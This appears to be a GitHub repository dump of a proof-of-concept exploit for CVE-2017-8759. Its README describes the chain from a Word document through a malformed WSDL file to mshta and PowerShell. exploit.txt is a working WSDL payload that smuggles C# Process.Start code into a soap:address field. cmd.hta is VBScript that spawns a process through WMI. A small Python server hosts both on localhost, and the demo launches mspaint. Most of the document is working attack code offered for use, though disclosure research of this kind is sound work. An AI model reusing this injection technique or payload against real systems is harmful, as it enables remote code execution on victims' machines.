├── Doc1.doc
├── server.py
├── cmd.hta
├── README.md
├── LICENSE
└── exploit.txt


/Doc1.doc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Voulnet/CVE-2017-8759-Exploit-sample/HEAD/Doc1.doc


--------------------------------------------------------------------------------
/server.py:
--------------------------------------------------------------------------------
 1 | import http.server
 2 | import socketserver
 3 | 
 4 | PORT = 8080
 5 | 
 6 | Handler = http.server.SimpleHTTPRequestHandler
 7 | 
 8 | with socketserver.TCPServer(("127.0.0.1", PORT), Handler) as httpd:
 9 |     print("serving at port", PORT)
10 |     httpd.serve_forever()
11 | 


--------------------------------------------------------------------------------
/cmd.hta:
--------------------------------------------------------------------------------
 1 | <html>
 2 | <head>
 3 | <script language="VBScript">
 4 | Sub window_onload
 5 | 	const impersonation = 3
 6 | 	Const HIDDEN_WINDOW = 12
 7 | 	Set Locator = CreateObject("WbemScripting.SWbemLocator")
 8 | 	Set Service = Locator.ConnectServer()
 9 | 	Service.Security_.ImpersonationLevel=impersonation
10 | 	Set objStartup = Service.Get("Win32_ProcessStartup")
11 | 	Set objConfig = objStartup.SpawnInstance_
12 | 	Set Process = Service.Get("Win32_Process")
13 | 	Error = Process.Create("powershell -nop cmd.exe /c mspaint.exe", null, objConfig, intProcessID)
14 | 	window.close()
15 | end sub
16 | </script>
17 | </head>
18 | </html>
19 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2017-8759-Exploit-sample
 2 | Running CVE-2017-8759 exploit sample.
 3 | 
 4 | 
 5 | 
 6 | Flow of the exploit:
 7 | 
 8 | Word macro runs in the Doc1.doc file. The macro downloads a badly formatted txt file over wsdl, which triggers the WSDL parser log. Then the parsing log results in running mshta.exe which in turn runs a powershell commands that runs mspaint.exe
 9 | 
10 | 
11 | 
12 | To test:
13 | 
14 | Run a webserver on port 8080, and put the files exploit.txt and cmd.hta on its root. For example python3 -m http.server -127.0.0.1 8080
15 | Or you can use python3 server.py
16 | 
17 | If all is good mspaint should run.
18 | 
19 | Mohammed Aldoub @Voulnet
20 | 
21 | ## References:
22 | 
23 | https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html
24 | 
25 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2017 Mohammed ALDOUB
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/exploit.txt:
--------------------------------------------------------------------------------
 1 | <definitions
 2 |     xmlns="http://schemas.xmlsoap.org/wsdl/"
 3 |     xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
 4 |     xmlns:suds="http://www.w3.org/2000/wsdl/suds"
 5 |     xmlns:tns="http://schemas.microsoft.com/clr/ns/System"
 6 |     xmlns:ns0="http://schemas.microsoft.com/clr/nsassem/Logo/Logo">
 7 |     <portType name="PortType"/>
 8 |     <binding name="Binding" type="tns:PortType">
 9 |         <soap:binding style="rpc" transport="http://schemas.xmlsoap.org/soap/http"/>
10 |         <suds:class type="ns0:Image" rootType="MarshalByRefObject"></suds:class>
11 |     </binding>
12 |     <service name="Service">
13 |         <port name="Port" binding="tns:Binding">
14 |             <soap:address location="http://127.0.0.1:8080?C:\Windows\System32\mshta.exe?http://127.0.0.1:8080/cmd.hta"/>
15 |                         <soap:address location=";
16 |                         if (System.AppDomain.CurrentDomain.GetData(_url.Split('?')[0]) == null) {
17 |                                 System.Diagnostics.Process.Start(_url.Split('?')[1], _url.Split('?')[2]);
18 |                                 System.AppDomain.CurrentDomain.SetData(_url.Split('?')[0], true);
19 |                         } //"/>
20 |         </port>
21 |     </service>
22 | </definitions> 
23 | 


--------------------------------------------------------------------------------